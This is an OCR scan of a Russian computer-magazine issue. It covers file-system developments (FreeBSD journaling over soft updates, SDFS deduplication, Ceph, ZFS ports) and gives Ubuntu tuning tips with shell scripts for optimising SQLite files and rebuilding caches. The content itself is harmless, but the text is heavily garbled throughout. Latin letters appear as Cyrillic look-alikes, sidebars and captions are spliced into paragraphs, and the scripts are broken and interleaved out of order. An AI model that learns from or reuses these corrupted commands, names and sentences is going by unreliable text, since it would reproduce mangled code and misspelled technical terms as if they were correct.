и соответствующие финансовые потоки». 
Как тут не вспомнить саркастичные правила 
успешного ведения ІТ-бизнеса в России: 
«Держите сервера за границей. Регист- 
рируйте домены за границей. Регистри- 
руйте компанию за границей. Уезжайте за 
границу». 

В самом деле, что делать, если ктебе из-за 
твоего ІТ-проекта приходят «маски-шоу» 
и без суда и следствия отключают все, что 
можно, и увозят на «экспертизу», которая 
тянется месяцами? Бежать на поклон к 
«царю-батюшке», если ты не «Агава», 
несколько проблематично, да и попытки от- 
стаивать свои праваунас далеко не всегда 
заканчиваются хорошо и успешно. 0х, не- 
легкое это дело — заниматься ІТ-бизнесом 
в России, т 
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Архитектура файловой системы СерЬ 

файловый путь 

Обзор новинок в мире файловых систем 




Файловые системы, как и любой другой компонент современных 
операционных систем, постоянно развиваются и сменяют друг друга. 

С ростом объемов хранилищ информации и появлением новых 
технологий обработки данных старые подходы кхранению 
информации отмирают, и на смену им приходят более совершенные и 
приспособленные к современным условиям. Следующие четыре полосы 
журнала посвящены последним тенденциям в области развития ФС. 



РРЕЕВ5Р И ЖУРНАЛИРУЕ- 
МАЯ ФАЙЛОВАЯ СИСТЕМА 

8 декабря прошлого года Джефри Робер- 
сон, создатель планировщика ІІІ_Е и один из 
активных разработчиков РгееВЗР, сообщил в 
своем блоге [ ЬирУ^еТг-ІесЬТіѵеригпабсот ] о 
проводимой работе над механизмом журнали- 
рования для стандартной файловой системы 



РР5 ( РазТ Рііе Бузует] ОС РгееВСй. Эта новость 
сразу стала поводом для насмешексо стороны 
многочисленныхтроллей, которые в очеред- 
ной раз окрестили ВЭЭ-системы ходячим 
трупом. Однако никто из нихтак и не понял сути 
происходящего. На самом деле разработанный 
Джефри механизм журналирования не совсем 
стандартен и достаточно прост, а его появле- 



нию 5 или даже 10 лет назад мешало только то, 
что в нем просто не было необходимости. Чтобы 
понять, почему, и в чем отличия нового меха- 
низма от появившегося не так давно С ЕОМ -мо- 
дуля дщигпаі (который теоретически позволяет 
прикрутить журнал даже к РАТ 1 2) или механиз- 
мажурналирования «официальных» файловых 
систем Ыпих, обратимся к истории. 
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Принцип работы 5РР8 



Время ожидания записи да иных од ним клиентом 
в кластер СерЬ 



Исторически файловая система представляет собой совокупность 
метаданных и блоков, непосредственно хранящих пользовательские 
данные. Во время произведения какой-либо операции над файлом 
происходит модификация сразу нескольких областей ФС, включая шаги 
по изменению метаданных и модификацию содержимого файла. Напри- 
мер, при создании нового файла, кроме непосредственной записи его 
содержимого на диск, ФС должна сделать следующее: 

1. Записать информацию о файле (тип, права доступа, количество ссы- 
лок и т.д.) в таблицу Фобе; 

2. Пометить блоки, выделенные для хранения файла, какзанятые; 

3. Записать связку “іпобе:имя_файла” в файл каталога. 

Причем все эти действия должны быть выполнены именно в такой 
последовательности. В идеальном мире все было бы прекрасно, од- 
нако реальность вносит свои коррективы. Подсистеме ѴР5, лежащей 
уровнем выше, и кэшу жесткого диска ничего неизвестно о метадан- 
ных. Для них вся записываемая информация — простой набор байт, 
поэтому если метаданные будут записываться на диск в асинхронном 
режиме, проходя через кэш ѴР5 и жесткого диска, никто не сможет 
гарантировать их запись в правильном порядке. Это обязательно 
приведет к противоречивому состоянию ФС в случае сбоя («повис- 
шие» указатели, неоднозначная принадлежность ресурсов, «оси- 
ротевшие» ресурсы], и тогда — привет, бзск, а в некоторых случаях 
— пересоздание ФС. 

Для решения этой проблемы можно использовать комбинированный 
режим записи, при котором метаданные будутзаписаны в синхрон- 
ном режиме, а данные — в асинхронном. Тогда фатальных ошибокФС 
можно избежать, и даже если сбой произойдет между вторым и третьим 
шагом вышеприведенной последовательности, ошибки будетлегко 
исправить с помощью выполнения бзск даже на уже смонтированной 
ФС. Но вот засада: синхронный режим записи приводит к колоссаль- 
ным потерям производительности, а сама запись идет очень медленно. 
Для обхода этой проблемы в свое время было предложено множество 
различных способов, из которых особенно популярным стал механизм 
журналирования. Суть проста: где-то в файловой системе отводится 
небольшой участокдля хранения журнала. Когда возникаетзапрос на 
создание или модификацию файла, вся информация об изменяемых 
при этом метаданных объединяется и помещается в журнал с помощью 
единой атомарной операции записи. Непосредственная же запись 
метаданных происходит в асинхронном режиме. В момент, когда все 
метаданные файла попадут на диск, соответствующая записьудаляет- 
ся изжурнала. В случае сбоя для приведения ФС в непротиворечивое 
состояние будет достаточно просто извлечь изжурнала все записи и 
применить их к файловой системе. Это разумный компромисс между 
производительностью и стабильностью: хотя запись в журнал и сказы- 
вается на производительности, но далеко нетаксильно, каксинх- 
ронная запись метаданных на диск, при которой головке винчестера 
приходится метаться между разными участками диска. 



Разработчики РгееВЭБ пошли по другому пути, применив механизм под 
названием «мягкие обновления» [5о^ ІІрсІаіез). В двух словах, его суть 
заключается в использовании специального кэша файловой системы 
для хранения изменений метаданных, их объединения и поддержки 
зависимости между друг другом. Это гарантирует правильную последо- 
вательность записи метаданных на диск и втоже время нетребует их 
синхронной записи. При использовании «мягкихобновлений»сбой мо- 
жет привести только кдвум несогласованностям файловой системы: по- 
висшие Фобе и блоки. Они не относятся к глобальным несоответствиям 
ФС (таким, например, какблоки, одновременно адресуемые двумя 
Фобе], поэтому она можетбыть смонтирована, а Фскзапущен в фоновом 
режиме на уже смонтированной ФС (собственно, так и происходит, начи- 
ная с пятой ветки РгееВЗБ]. 

Единственный заметный минус 5оФ Црбаіез в сравнении сжурналом 
состоит в том, что запущенный в фоновом режиме іъск заметно кушает 
ресурсы, что при больших объемах дисков может привести кдостаточно 
длительным провалам производительности. Само собой, такое положе- 
ние вещей не нравилось многим, и, в конце концов, компании іХзузіетз, 
Ѵабоо! и Ц и п і рег пеіѵѵогкз «скинулись» и заплатили Джефри за исправ- 
ление этого недочета. 

Новая система журналирования (работа над которой веласьсовместно 
савтором «мягких обновлений» — Кирком МакКузиком] стала ничем 
иным, какпростым расширениемтехнологии 5оФ ІІрбаІез. В отличие 
оттрадиционных систем журналирования, она регистрирует только те 
самые операции выделения и освобождения блоков и Фобе, тогда как 
все остальное берет на себя механизм 5о^ Црбаіез. Благодаря этому 
удалось достичь минимальных размеровжурнала и более высокой по 
сравнению с традиционным журналированием производительности. 

50Р5 — ФАЙЛОВАЯ СИСТЕМА 
ДЛЯ ВИРТУАЛЬНЫХ ОКРУЖЕНИЙ 

Модель облачных вычислений приобретаетвсе большую популярность. 
Для многих компаний (и даже частных лиц) проще и выгоднее арендо- 
вать на время уже готовые к работе выделенные виртуальные серверы, 
чем покупать дорогостоящее серверное оборудование и оплачиватьего 
поддержку. Виртуальные серверы удобны, надежны, их легко восстано- 
вить после сбоев. Однако провайдерууслугоблачных вычислений их со- 
держание обходится в кругленькую сумму, что сказывается на стоимости 
аренды, и, следовательно, на популярности среди клиентов. В среде 
провайдеров постоянно идетпоискспособовудешевления содержания 
виртуальных машин и всей инфраструктуры в целом. Один из способов 
сделать это заключается в использовании технологии дедупликации 
данных, которая позволяет сэкономить существенные средства на объ- 
емах дискового хранилища. 

Дедупликация данных представляет собой процесс исключения 
избыточности данных путем удаления лишних копий информации и 
сохранения на их месте ссылок на единственный экземпляр. Чтобы 
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понять, почему это так важно, и сколько дискового пространства можно 
сэкономить, представь себе следующую картину: ты занимаешься 
предоставлением услугтипа «виртуальный сервер в аренду», и для 
любого обратившегося ктебе клиента создаешь виртуальный сервер 
на основе РесІ Наі Епіегргізе І_іпих 5. Дела идутхорошо, поток клиентов 
растет, и вскоре их количество приближается к отметке 1000. Ты имеешь 
хорошую прибыль, но большая ее часть уходит на покупку нового железа. 
Если представить, что каждому клиентуты выделяешь 10 Гб дискового 
пространства, то для обслуживания 1000 клиентовтебе понадобится 
примерною Тб дискового пространства, а это около 20 жестких дисков 
по 500 Гб каждый. При этом как минимум четыре из них используются 
для хранения одних итехже данных, ведь базовая инсталляция ОС 
занимаетоколо 2 Гб, а все эти клиенты используют одну ОС. Сложив, по- 
лучаем 2 Тб копий копий копий базовой инсталляции Веб Наі Епіегргізе 
Ыпихб. Применив дедупликацию, ты смогбы избавиться отвсехэтих 
копий, освободив солидный участок пространства, которое заняли бы 
еще 200 клиентов! 

Поддержка дедупликации да иных существует в некоторых решениях ЫА5 
и коммерческих программных продуктах. Она была добавлена в файло- 
вую систему 2Е5 в ноябре 2009 года, а совсем недавно была выпущена 
дедуплицирующая распределенная файловая система 50Е5, разрабо- 
танная в рамках открытого проекта Орепбебир [ ѵѵѵѵѵѵ.орепбебир.огд і. 
Несмотря на название, 50Е5 не является файловой системой в прямом 
смысле слова. Это прослойка, написанная на языке баѵа и реализо- 
ванная с использованием механизма для создания файловых систем 
пространства пользователя Юзе ( Юзе.зГпеЮ 50Е5 состоит из следую- 
щих компонентов: 

1 . Ризе Вазеб Рііе Бузіет. Файловая система уровня пользователя, 
предоставляющая доступ к файлам и каталогам. 

2. йебир Рііе Епдіпе. Сервис на стороне клиента, который принимает все 
запросы на доступ кфайлам от файловой системы и отвечаетза хране- 
ние метаданных и карты дубликатов, связанных с файлами и каталогами. 

3. ОебирІісаІіопБіогаде Епдіпе. Серверная сторона, движокдедуплика- 
ции. Отвечаетза хранение, извлечение и удаление повторяющихся дан- 
ных. Для хранения данных использует низлежащую файловую систему 
или хранилище Атагоп 53, индексируя блоки с помощью хэш-таблицы. 
На всех машинах, которые должны участвовать в хранении данных, 
запускается движок дедупликации. На клиентских машинах, использую- 
щиххранилище данных, запускается сервис Оебир Рііе Епдіпе, который 
подключается кдоступным движкам дедупликации и получает доступ к 
хранилищу. Для общения с Оебир Рііе Епдіпе файловая система (Ризе 
Вазеб Рііе Бузіет] использует механизм б N I (баѵа Ыабѵе I пЕегбасе) . 

Кроме стандартной файловой системы для хранения данных может исполь- 
зоваться хранилище Атагоп 53. Общий размер ФС способен достигать8 Пб, 
максимальный размер одного файла — 250 Гб, файловая система можетбыть 
«размазана» по 256 различным хранилищам, обслуживаемым Оебиріісабоп 
БЮгаде Епдіпе. Выявление и устранение дубликатов данных происходит 

на уровне блоков размером 4 Кб. Файловая система способна производить 



дедупликацию на лету (во время записи новых данных] или же запускаться в 
промежутках наименьшей активности операций ввода-вывода какфоновый 
процесс. Среди других особенностей 50Е5 можно отметить поддержку 
снапшотов на уровне файлов и каталогов, поддержку экс по рта с помощью 
протоколов ЫЕ5 и СІЕ5 и достаточно высокую производительность. 

СЕРН — РАСПРЕДЕЛЕННАЯ 
ФАЙЛОВАЯ СИСТЕМА 

Ситуация с распределенными файловыми системами в мире Ореп 
5оигсе далека от идеала. Существует множество готовых для про- 
мышленной эксплуатации проектов, однако ни один из них не может 
похвастаться хорошим сочетанием важныхдля распределенныхФС 
характеристик. Одни обладают высокой надежностью, но проваливают 
тесты на производительность, другие вырываются в лидеры по скорости 
доступа, но обеспечивают не самый лучший показатель надежности и 
расширяемости, третьи могут расти почти до бесконечности, но изде- 
вательски медленны. Неудивительно, что исследовательские работы в 
этой области ведутся непрерывно, и почти каждый год мы становимся 
свидетелями рождения новой распределенной ФС, которая претендует 
на звание идеала. Это произошло и с файловой системой Серб, которая 
оказалась настолько успешной, что код ее клиента было решено вклю- 
чить в Еіпих-ядро версии 2.6.34. 

Серб ( бІІрУАіерб.пеѵѵбгеат.пеі: ] имеет достаточно долгую историю раз- 
вития; впервые ее архитектура была описана автором Сэйджем Вилом 
в его дипломной работе в 2006 году. К ноябрю 2007 года он представил 
стабильную версию, реализованную с использованием Юзе, и начал 
работать над реализацией модуля для ядра Ыпих. Сегодня Серб уже 
достаточно стабильна для повседневного использования. 

Среди главных плюсов Серб автор отмечает следующие: 

• Совместимость со стандартом Р05ІХ; 

• Прозрачное масштабирование от десятка до тысячи узлов; 

• Общий объем хранилища (может составлять сотни петабайт); 

• Высокие показатели доступности и надежности; 

• Ы-ѵѵау репликация всехданных на множество узлов; 

• Автоматическая ребалансировка данных в случае добавления/удале- 
ния узла для более эффективного использования ресурсов; 

• Простота развертывания (большинство компонентов файловой систе- 
мы реализованы в видедемонов пространства пользователя); 

• Наличие Юзе-клиента; 

• Наличие клиента для ядра Юі п их. 

В отличие от кластерных файловых систем, таких как(ЗЕ5, ОСЕ52 и (ЗРЕ5, 
которые опираются на симметричный доступ всех клиентов кобщим 
блочным устройствам, Серб разделяетуправление данными и метадан- 
ными путем использования независимых кластеров (примернотакже, 
какэто делает бизЮе). Однако, в отличие от последней, узлы, управ- 
ляющие метаданными и хранилищем, нетребуют какой бы то ни было 
поддержки со стороны ядра; весь код работает в пространстве пользова- 
теля. Для хранения объектов данныхузлы могут использовать блочные 
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устройства, образы или низлежащую файловую систему. Когда один из 
узлов даетсбой, данные реплицируются самими узлами, благодаря чему 
достигается высокий уровень эффективности и масштабируемости. 
Серверы, отвечающие за хранение метаданных (теіабаіа зегѵег], 
представляют собой нечто вроде большого согласованного распреде- 
ленного кэша на вершине кластера-хранилища, который динамически 
перераспределяет метаданные в ответ на изменение нагрузки и легко 
переносит выход узлов из строя. Меіабаіа зегѵег использует особый 
подход для хранения метаданных, который позволяет достичь высоких 
показателей производительности. Например, іпобе-запись, имеющая 
только однужесткую ссылку, помещается прямо в каталоговую запись. 
Поэтому каталог вместе со всеми адресуемыми им іпосіе'ами может быть 
загружен в кэш с помощью одной операции ввода-вывода. Содержимое 
очень больших каталогов фрагментируется и отдается на управление 
независимым теіабаіа-серверам, благодаря чему операцию доступа к 
каталогу можно легко распараллелить. 

По словам автора Серб, наиболее важное достоинство его ФС 
заключается в полностью автоматизированном механизме ребалан- 
сировки и миграции при масштабировании от небольшого кластера, 
состоящего из несколькихузлов, до кластера корпоративных масшта- 
бов, в котором участвуют несколько сотен узлов. Этот процесс требует 
минимального вмешательства администратора, новыеузлы могутбыть 
подключены к кластеру, и все будет «просто работать». 

ЧТ0ТАМС2Р5? 

На сегодняшний день 2Р5 остается самой продвинутой файловой сис- 
темой, аналогов которой нетнетолько в мире Ореп Зоигсе, но и в среде 
коммерческого ПО. Она быстра, надежна, имеетбогатый функционал 
и невероятно проста в администрировании. Изначально созданная 
компанией 5ип Місгозузіетз (привет Огасіе) для операционной системы 
Зоіагіз и анонсированная в 2005 году, она сразу стала лакомым кусочком 
для пользователей и раз работч и ков других операционных систем. Одна- 
ко далеко не всем из них удалось почувствовать ее вкус. 

Первыми претендентами на включение кода 2Р5 в свою ОС стали, 
конечноже, линуксоиды, готовыетащить в ядро все, что не привинче- 
но болтами. Но судьба (роль которой, скорее всего, сыграла сама Зип] 



распорядилась иначе. Код2Р5, каки всей операционной системы 
ОрепЗоІагіз, оказался защищен лицензией СООІ_, которая накладывает 
серьезные ограничения на его использование и, болеетого, совер- 
шенно несовместима слицензией 0РІ_ѵ2, используемой ядром Ыпих. 
Фактически это означает, что естьтолькотри пути включения 2Р5 в ядро: 
нелегальный, который включает в себя перенос 2Р5 без соблюдения 
закона об авторском праве, юмористический, при котором код Ыпих 
лицензируется под СООІ_, ититанический, когда огромная кодовая база 
2Р5 переписывается под СРІ_, да еще и с обходом Зип'овских патентов. 

В общем — не комильфо, поэтому единственный способ задействовать 
2Р5 в Ыпих — это использовать ее порт на Іизе ( ЫірУДіз-Іизе.пеі ]. стра- 
дающий багами и низкой производительностью, которая в силу архитек- 
турных особенностей 2Р5 вряд ли сможет повыситься без переноса хотя 
бы части кода в ядро. Компания Арріе также планировала внедрение 
2Р5 в Мае 05 X и даже успела вы пустить экспериментальный драйвер и 
внедрить поддержку чтения 2Р5 в версию 10.5 1_еорагсІ, однако в октябре 
2009 года проектзакрыли без объяснения причин. Учитываято, что 
лицензия ВЗЭ, покрывающая код ядра Мае 05Х, позволяла без проблем 
перенести 2Р5 в ОС от Арріе с минимальными затратами, такой поступок 
можно объяснить либо давлением со стороны Зип, либо глобальными 
изменениями в планах самой Арріе. 

В апреле 2007 года Павел Якуб Давидекзакончил портирование 2Р5 
в РгееВЗО. На протяжении двух лет кодбыл помечен какэксперимен- 
тальный, но после исправления ряда проблем разработчикобъявил о 
стабилизации порта, и 1 5 октября прошлого года РгееВЗО стала первой 
ОС после Зоіагіз, готовой к промышленной эксплуатации 2Р5. По 
состоянию на 1 1 января 2010 года восьмая ветка РгееВЗО полностью 
поддерживает2рооІѵ14 (текущая версия 2Р5 в ОрепЗоІагіз: грооіѵіб]. 
Работа по поддержке 2Р5 велась и разработчиками ЫеіВЗО. В рамках 
проекта Ооодіе Зиттегоі Собе 2007 был представлен начальный (но 
неработающий] порт файловой системы. Работа по доведению кода до 
ума продолжилась как часть Зііттегоі Собе 2009, и в августе 2009 года 
поддержка 2Р5 была добавлена в репозиторий ЫеіВЗО. 

Небольшая часть кода 2Р5 открыта под ОРІ_, благодаря чему удалось 
интегрировать его в загрузчик ОРЮ В, который теперь умеет выполнять 
загрузку с 2 Н5- раздел а 
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Пока наши братья- гентуш ники неделями ком пилят свою систему, мы 
применим парочку советов и точно обгоним самого быстрого пингвина 
на планете. Убунту итак шла практически вровень с бепіюо, но наши из- 
менения позволят вырвать победу излап Рудозсеііз рариа. Пристегнись, 
мы ускоряемся! 



ОТКЛЮЧЕНИЕ С0МРІ2 

Сотріг —композитный менеджер окон для X 
ѴѴіпбоѵѵ Бузует, использующий ОрепСБдля 
ускорения 30-графики. Он предоставляет 
множество новых графических эффектов, до- 
ступных в любых средах рабочего стола, в том 
числеСІЧОМЕи КОЕ. Если у тебя установлены 
драйвера для видеокарты, то, скорее всего, 
менеджер включен. Помни, что видеокарта с 
Сотріг, включенным в режиме «Производи- 
тельность по запросу», постоянно работает 
на полную нагрузку и не собирается сбав- 
лять обороты вентилятора. Если хочешь от 
видеокарты тишины или бережешь киловат- 
ты, советую упростить эффекты Сотріг или 
отключить его совсем. В первом случае нужно 
установить пакет сотрігсопГід-зеШпдз- 
тападег через Синаптик или в Терминале 
скомандовать: 



$ зисіо арДіДисІе іпзкаіі 
сотрігсопЕід-зеДДіпдз-тападег 

Чтобы получить доступ к возможностям Сотріг 
и упростить эффекты по своему вкусу, проходим 
по маршруту: Меню Система Параметры 
Менеджер настройки Сотріг СопЕд. Если 
желаешь просто отключить Сотріг, то это 
можно сделать через пункт Меню -> Система 
Параметры Внешний вид, в закладке «Вне- 
шний вид» выстави «Без эффектов». 

УМЕНЬШЕНИЕ 
ЗАДЕРЖЕК ОТК 

В ІЛэипШ рабочей средой является Споте, где 
важную роль играет 6ТК. Изменяя настройки 
этого тулкита, мы влияем на все приложения, 
использующие его. Предлагаю подкрутить 
параметры, отвечающие за задержки: 



$дес!іІ ~/.дІкгс-2.0 

### Минимальное время в милли- 
секундах, в течение которого 
указатель должен оставаться на 
пункте меню перед появлением 
подменю 

дрк-шепи-рорир-сіеіау = О 
### Время в миллисекундах перед 
скрытием подменю, когда указа- 
тель перемещается на подменю 
дрк-шепи-рорскллі-сіеіау = О 
### Задержка в миллисекундах перед 
появлением подменю после панели меню 
дРк-шепи-Ьаг-рорир-сіеІау = О 

ЮВЕЛИРНАЯ 
НАСТРОЙКА 6И0МЕ 

В Споте настройки хранятся по аналогии с 
реестром М5 ѴѴіпсІоѵѵз, стой лишь разницей, 
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Ищем зависящие от КРЕ программы 



Если утебя установлен режим, при котором во время наведения мыши 
на окно открытого приложения последнее выдвигается на передний 
план, то можно потвикать параметр а и1:о_га іэе_сІе Іау, контролирующий 
задержку между наведением мыши и выдвижением окна: 

$ дсопГСоо1-2 --Туре іпТедег --зеТ /аррз/шеТасіТу/ 
депега1/аиТо_гаізе_с1е1ау 100 

ОПТИМИЗАЦИЯ хмь 

В структурированных файлах ХМ І_ многие программы в ІІЬипІи хранят 
настройки и данные. Есть возможность преобразоватьХМЕ из «чита- 
бельного» формата, понятного человеку, в формат, удобный компью- 
теру. ПреобразованныеХМЕ-файлы быстрее загружаются и занимают 
меньше ОЗУ. В таком преобразовании помогутскрипты, которые можно 
скачать по адресу: ѵ\ллл/ѵ.дпотеЯ[ез.огд/арр.рЬр?5оН іб=1397 . Распако- 
вываем полученный архив (безкІюр-орбтігабопзТаг.дД и по очереди 
запускаем скрипты от обычной учетной записи: 

1 . гЬуіНтЬох-диіскзІаіі оптимизирует файлы музыкального проигрыва- 
теля РЬуШтЬох; 

2. еѵоіиііоп-орбтіге оптимизирует файлы почтовой программы 
Еѵоіибоп; 

3. дпоте-орбтіге оптимизирует файлы Споте; 

4 . орепоДісе-орбтіге оптимизирует файлы офисного пакета ОрепОДісе. 



что «реестр» Споте- это ХМІ_-файлы. Доступ к ним можно получить 
через редактор конфигураций дсопІ-ебНог или через вызов команды 
дсопНооІ-2. Чтобы ускорить время отклика «реестра», предпримем 
следующие шаги: 

1. Укажем Меіасііу не использоватьанимационные эффекты, снизивтем 
самым потребление ресурсов: 

$ дсопГСооІ-2 --Суре Ъооі --зеС /аррз/шеСасіСу /депегаі/ 
гесіисес1_гезоигсез Сгие 

Единственное, что визуально изменится - при перемещении окон не 
будет отображаться содержимое; 

2 . Выключим анимацию включения/выключения панелей: 

$ дсопГСооІ-2 --Суре Ъооі --зеС /аррз/рапеІ/дІоЪаІ/ 
епаЫе_апішаСіопз Гаізе 

3. Отключим вспомогательныетехнологии клавиатуры, мыши и т.д., 
предназначенные для людей с ограниченными возможностями: 

$ дсопГСоо1-2 --Суре Ъооі --зеС /ЪезкСор/дпоше/ 
іпСегСасе/ассеззіЪіІіСу Саізе 

4 . Зададим скоростьанимации панелей «Быстрая»: 

$ дсопГСоо1-2 --Суре зСгіпд --зеС /аррз/рапеІ/дІоЪаІ/ 
рапе1_апішаСіоп_зреесі рапеІ-зрееЪ-ГазС 



огд ; 

5 . бос-орбгтше оптимизирует файлы помощи Споте; 

6. дсопЪоріітіге оптимизирует файлы конфигураций Споте («реестр» 
Споте]. 

Если в системе несколько аккаунтов, то скрипты гбуіЪтЬох-диіскзІіагІ: 
и дсопЪорбтке нужно запускать от каждой учетной записи. Ничего 
страшного не произойдет, если ты запустишь скрипты несколько раз - 
оптимизация «уже оптимизированного» не разрушительна. Желательно 
перезайти всистемупослеоптимизацииХМБдлятого, чтобы изменения 
вступили в силу. 

Скрипты оптимизируют какфайлы в домашней директории, таки сис- 
темные файлы, запрашивая привилегии через зисіо. Скрипты делают 
резервные копии, но если при длительной процедуре оптимизации у 
тебя из-за сбоя электросети перезагрузится компьютер, то результаты, 
возможно, будут неоднозначны и плачевны. Наличие ИБП приветству- 
ется. 

УСКОРЕНИЕ ЗАПУСКА ПРОГРАММ, 
ИСПОЛЬЗУЮЩИХ ОТ 

Традиционно считается, что Споте —это СТК, а КБЕ — это 01, но пользо- 
вателю ничто не мешаетзапускать программы СТК в КБЕ, а СИ: програм- 
мы в Споте. Даже больше! Авторы Споте и КБЕ многое сделали, чтобы 
«чужие» программы внешне выглядели также, как«родные». Сейчас мы 
рассмотрим, какускоритьзапускпрограмм, написанных с использова- 
нием СИ в Споте. В действительности, СИ'шная прога может не зависеть 
от КБЕ, но использовать возможности этой среды. Для этого при старте 
она должна получить«минимальный набор КБЕ». Какузнать, какие 
программы зависят от КБЕ? В Терминале даем команду: 
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Еепи этот кпщц установлен, то МеЕзеіЕу 
Краткое описание: использует меньше системных ресурсов за 

сч#т пониженного удобства а использовании. 
Подробное описание: И (те. твіасНу ѵгііі В.іѵр ТПе изег \еѣь ГеесМэасК Оу оЫпй 
ѵѵігѳГгатві. аѵйгііпе апітаікнв. ог аиш тыл*. ТПІ5 й а 
эКліИеат гсбийіол іп иадоіиу № говпу изетз. от таг а^№ 
Іей«? врріісебопэ Ш солімцеуѵоік'ілй, дгій тагу аізо бе в 




> іпіо 

•Проверить 
степень отзывчи- 
вости интерфейса 
позволит СТКРегЕ 

Ііпих.зоИресІіа. 

сот/ргодРоѵѵпІоасІ/ 

ОікРегІ- 

РоѵѵпІоасІ-671 5.Нті 

• Применяй советы по 
одному, каждый раз 
желательно пере- 
загружать систему. 
Проверяй влияние 
совета временем, не 
торопись. 

•Чудес не бывает. Со- 
веты либо задейству- 
ютсвободную память, 
либо отключают что- 
то для ускорения. 



> СІѴСІ 

На прилагаемом 
к журналу диске ты 
найдешь скрипты 
орІітігег.зЬ, здІіІе_ 
збгіпк.зЬ 

и гебиіісі сасбе.зЬ. 
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Скрытый файл настроек .аІкгс-2. 0 в дома 
ней директории 



ш- 



Редактор конфигурации Споте 



$ зисіо арДіДисіе зеагсЬ 1 ~і ! ~п1іЪ (~БдД I -Бксіе) ' 

На экран будут выведены пакеты, которые установ- 
лены С~і ') И это не библиотека ( ' ! ~ п I і Ь ' ) И в зависи- 
мостях есть 01: Г-РдН] ИЛ И в зависимостях есть КОЕ 
Г-Рксіе']. Заранее запуская «минимальный набор КРЕ» 
и удерживая в памяти соответствующие библиотеки, 
мы добьемся ускорения при старте этих программ. 
Трюквесьма прост: в Меню Система Параметры 
Запускаемые приложения добавляем запускаемую 
программу /изг/Ьіп/кбеіпТ под именем РазШі. Все, 
после перезагрузки компьютера твои Сопрограммы 
будут стартовать быстрее. 

УСКОРЕНИЕ ЗАПУСКА ПРОГРАММ 
С ПОМОЩЬЮ РРЕЮАО 

Ргеіоасі - демон, работающий в фоновом режиме, который 
собираетинформацию о наиболее часто используемых про- 
граммах, кэшируетих и используемые ими библиотеки, что 
приводиткповышению скорости загрузки программ. Нужно 
просто установить ргеіоасі командой: 

$ зисіо арДіДисіе іпзДаІІ ргеіоасі 

Или запустить Синаптик, найти в нем ргеіоасі и устано- 
вить его. Настройки ргеіоасі по умолчанию подходят для 
большинства пользователей, поэтому изменять что-либо в 
файле /еіс/ргеіоасі.сопі не нужно. 

ЛЕГКАЯ ОПТИМИЗАЦИЯ 
ФАЙЛОВ 50ЫТЕ 

Многие программы в ІЛэипІи хранят свои данные 
не в текстовых файлах, а в базах данных, и часто в 
качестве последних выступают ЗОиіе. Средствами 
таких СУБД можно почистить пустые записи и создать 
индексы файла базы данных заново. Первым делом 
устанавливаем зрІіІеЗ через Синаптик или набираем 
в Терминале: 

$ зисіо арДіДисіе ІпзДаІІ здІіДеЗ 



Далее создаем скрипт для оптимизации данных в СУБД 
ЗОиіе. Он будет выполнять переиндексацию и удаление из 
таблиц пустыхзаписей. 

$ десііі ~/Ьіп/орІітІ2ег.5И 

# ! /Ып/зк 

### Оптимизация для ЕігеДох 

Діпсі ~/ .шогіііа/ -пате 1 *.зд1іДе' -ргіпД -ехес 
здІіДеЗ {} "ѴАСШМ; КЕШБЕХ; " > /сіеѵ/пиіі 2>&1 \; 
### Оптимизация для Еріркапу 
Діпсі ~/ . дпоте2/ерірЬапу -пате ' *.зд1іДе' 

-ргіпД -ехес здІіДеЗ {} "ѴАСШМ; КЕШБЕХ; " > 
/сіеѵ/пиіі 2>&1 \; 

### Оптимизация для ЬіДегеа 

здІіДеЗ ~/ . 1іДегеа*/1іДегеа.сіЪ "ѴАСШМ; 

КЕШБЕХ; " > /сіеѵ/пиіі 2>&1 

ехіД О 

С помощью команды «сбтоб +х -/Ьіп/орІітігег.зН» делаем 
файл исполняемым. 

Периодически можно вызывать этотскрипт при закрытых 
программах, чьи файлы баз данных мы хотим оптимизи- 
ровать. 

ТОТАЛЬНАЯ ОПТИМИЗАЦИЯ 
ФАЙЛОВ 50ЫТЕ 

В предыдущем разделе мы оптимизировали ЗОШе-файлы 
данных браузеров Еігеіох, Ерірбапу и РЗЗ-читалки Ніегеа. 
Сейчас немного усложним задачу. Найдем в домашней ди- 
ректории все ЗОШе-файлы и конкретно ихзаоптимизируем 
:). Что нам потребуется? 

1. Установи зцІіІеЗ через Синаптикили вТерминале, еслиты 
еще этого не сделал: 

$ зисіо арДіДисіе ІпзДаІІ здІіДеЗ 

2. Создай файл ~/Ьі п/зц Іі1е_5Ьгіпк.5Ь следующего содержа- 
ния: 

$ десііі ~/Ьіп/5дІіІе_5Нгіпк.5Іі 

# ! /Ьіп/йЬ. 

Діпсі ~/ -зізе +100к -Дуре 1 -ргіпДО I \ 
вдЫІе геасі -сі ' ' ЕІЬЕ; сіо 

аЪз_Ді1е_пате=$ (геасіііпк -1 " $ЕІЬЕ" ) 
кеас1Ді1е= 'кеасі -с 15 " $аЪз_Ді1е_пате" ' ; 

11 [ " $1^еасі1і1е ,, = "ЗОЫке Іогтак 3" ]; ккеп 
1і1е_зІ2е_сіо= 'сіи -Ь " $аЬз_1і1е_пате " | сиД 



► 084 
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$ десШ ~/Ьіп/геЬиіШ_сасИе.5Н 

# ! /Ъіп/зк 

### Обновление кэша иконок в своей папке 

бог б іп ~/.ісопз/*; бо дбк-ирсіабе-ісоп-саске -6 $б; 

бопе 

### Обновление кэша иконок в системе 

бог б іп /изг/зкаге/ісопз/* ; бо зибо дбк-ирсіабе-ісоп- 

саске -6 $б; бопе 

### Обновление кэша шрифтов 

зибо 6с-саске -6ѵ 

іс-саске ~/ . бопбз 

Сделай файл исполняемым с помощью команды “сбтосі +х ~/Ьіп/ 
геЬи і ІсІ_сасЬе.зЬ ”. Если добавляешь в систему новые шрифты итемы 
Споте, то запускай скрипт ~/Ьі п/геЬи і ІсІ_сасЬе.5Ь, который построит для 
них кэши. 



Польза отѵт.5\д/арріпѳ55=10 



КЭШИРОВАНИЕ СИМВОЛЬНЫХ ТАБЛИЦ 



Создай пустой каталог: 



- 61 '; 

здІібеЗ " $аЪз_6і1е_паше" "ѴАСШМ; КЕШБЕХ; " > / 
беѵ/пиіі 2>&1 

6і1е_зІ2е_роз1е= 'би -Ь " $аЪз_6і1е_пате" I сиб -61'; 

еско " $аЬз_6і1е_пате" ; 

еско "Размер ДО $6і1е_зІ2е_бо" ; 

еско "Размер ПОСЛЕ $6і1е_зІ2е_роз1е " ; 

еско -п "Процент " 

еско "зса1е=2; ( $6і1е_зІ2е_роз1е/$6і1е_зІ2е_ 
бо) *100" ІЬс -1 
6і 
бопе 
зіеер 2 
ехіб О 

3. Сделай ~/Ьіп/здІі1:е_5І~ігіпк.5Ь исполняемым через Наутилус или в 
